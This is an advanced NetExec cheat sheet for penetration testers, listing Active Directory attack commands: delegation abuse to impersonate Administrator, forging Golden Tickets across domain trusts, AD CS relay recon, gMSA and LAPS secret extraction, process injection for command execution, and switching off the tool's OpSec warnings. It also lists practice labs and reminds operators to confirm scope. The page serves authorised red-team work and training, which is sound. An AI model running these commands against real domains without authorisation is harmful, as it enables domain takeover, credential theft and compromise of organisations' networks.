POSTS

NetExec Advanced

Follow-up to the NetExec cheatsheet: deeper Active Directory abuse techniques, delegation attacks, and operational tooling for experienced operators.

NetExec Advanced
947 words · 5 min

This page picks up where the main NetExec cheatsheet leaves off. It covers techniques that need more context, carry more risk, or are simply used less often — the kind of thing you reach for once you’re comfortable with the basics. Nothing here is repeated from the main sheet.

Operational flags

# Route all output through nxc's SQLite DB into your engagement workspace (see main sheet's Logging & database section)
netexec <protocol> <target> -u <user> -p <password> --log run.log

# Silence the OpSec warnings nxc prints before risky actions (persists via nxc.conf, not a CLI flag)
# ~/.nxc/nxc.conf -> [nxc] ignore_opsec_warnings = True

# Audit mode: dry-run a module/action without actually touching the target
# Configure in nxc.conf under the relevant module/protocol section

Kerberos delegation abuse

Resource-Based Constrained Delegation (RBCD)

If you control an account listed in a target object’s msDS-AllowedToActOnBehalfOfOtherIdentity, nxc can drive the whole S4U exchange and impersonate any user on that object:

netexec smb <target> -u <user> -p <password> --delegate Administrator

RBCD without an SPN (--u2u)

Accounts without an SPN normally can’t complete S4U2Self (KDC_ERR_S_PRINCIPAL_UNKNOWN). The --u2u flag chains user-to-user Kerberos so the ticket is encrypted with your own TGT session key instead of an SPN-derived key. Workflow:

# 1. Get a TGT for the SPN-less account and read its RC4 session key
netexec smb <target> -u <user> -p <password> --generate-tgt <basename>
export KRB5CCNAME=<basename>.ccache
describeTicket.py <basename>.ccache

# 2. Set the account's NT hash to that session key
netexec smb <target> -u <user> -p <password> -M change-password -o NEWNTHASH='<rc4_session_key>'

# 3. Run the delegation chain using the cached ticket
export KRB5CCNAME=<basename>.ccache
netexec smb <target> --use-kcache --delegate Administrator --u2u

This needs RC4 to still be viable in the domain and will reset the account’s usable password/hash — plan for that.

S4U2Self only (no RBCD object required)

Any computer account can nearly always get local admin on itself via S4U2Self:

netexec smb <target> -u 'COMPUTER$' -H <nt_hash> --delegate Administrator --self

Domain trusts abuse

Raisechild — child ↔ parent forest trust

Automates forging a Golden Ticket with an extra SID (e.g. Enterprise Admins) across an intra-forest transitive trust, working in either direction. It dumps the child domain’s krbtgt hash, enumerates the trust, and crafts the ticket for you — supports AES so it still works with RC4 disabled (e.g. Server 2025). The target username must exist in both domains (PAC validation).

Works child → parent and parent → child.

netexec ldap <target> -u <user> -p <password> -M raisechild

Using a specific account:

nxc ldap <target> -u <user> -p <pass> -M raisechild -o USER=test123 USER_ID=1111

Using AES256:

nxc ldap <target> -u <user> -p <pass> -M raisechild -o ETYPE=aes256

Change the injected extra SID:

nxc ldap <target> -u <user> -p <pass> -M raisechild -o RID=512
  • Module Options:
OptionDescriptionDefault
USERUser to impersonate (must exist in both domains)Administrator
USER_IDRID of USER in the current domain500
RIDExtra SID RID injected from the other domain519 (Enterprise Admins)
ETYPErc4 / aes128 / aes256rc4

The RID must always correspond to the domain whose krbtgt key is used to forge the ticket.

ESC8 (AD CS web enrollment + NTLM relay)

nxc’s adcs module is the recon step; combine with a coercion method (see main sheet’s vulnerability checks) and an NTLM relay tool to actually relay to the CA’s web enrollment endpoint:

netexec ldap <target> -u <user> -p <password> -M adcs                    # list enrollment servers
netexec ldap <target> -u <user> -p <password> -M adcs -o SERVER=<ca_fqdn> # list templates on a CA

Rights and secrets extraction

# Read effective DACL rights on an AD object (who can write to what)
netexec ldap <target> -u <user> -p <password> -M read_dacl -o TARGET=<object>

# Convert/decrypt gMSA secrets after dumping them with --gmsa
netexec ldap <target> -u <user> -p <password> --gmsa-convert-id <id>
netexec ldap <target> -u <user> -p <password> --gmsa-decrypt-lsa <gmsa_account>

LAPS internals

--laps isn’t just a flag on --sam/--ntds runs — it’s a standalone core option once you hold an account that can read the LAPS attribute, letting you authenticate across a whole domain of rotating local admin passwords without knowing them ahead of time:

netexec smb <target> -u <user> -p <password> --laps
netexec smb <target> -u <user> -p <password> --laps -x whoami

Impersonation & process-level tricks

# Run a command in the context of a specific process ID (requires SYSTEM on the target)
netexec smb <target> -u <user> -p <password> -M pi -o PID=<target_pid> EXEC=<command>

pi injects into an existing process owned by a logged-on user to run commands as that user — useful when schtask_as (see main sheet) isn’t viable because the target has no interactive session, only a running process.

NetExec Lab

You can deploy all labs on your own infrastructure (VMware, VirtualBox, or Ludus).

We recommend Ludus for the best experience, but the choice is entirely yours 🔥

  1. First Lab: LeHack 2024 - Rome
  2. Second Lab: Barbhack 2024 - Batman
  3. Third Lab: LeHack 2025 - Star Wars
  4. Fourth Lab: Barbhack 2025 - Pirates of the Caribbean

LeHack 2024 - Rome

LeHack 2024 - Rome

Barbhack 2024 - Batman

Barbhack 2024 - Batman

LeHack 2025 - Star Wars

LeHack 2025 - Star Wars

Barbhack 2025 - Pirates of the Caribbean

Barbhack 2025 - Pirates of the Caribbean

Notes

  • These techniques assume you already hold valid credentials or a foothold — always confirm scope and rules of engagement before running delegation, trust-abuse, or shell-delivery modules.
  • Most of the above change domain state (password/hash resets, scheduled tasks, forged tickets) — clean up afterward and log everything (--log) for the final report.
  • Full module list and options: netexec.wiki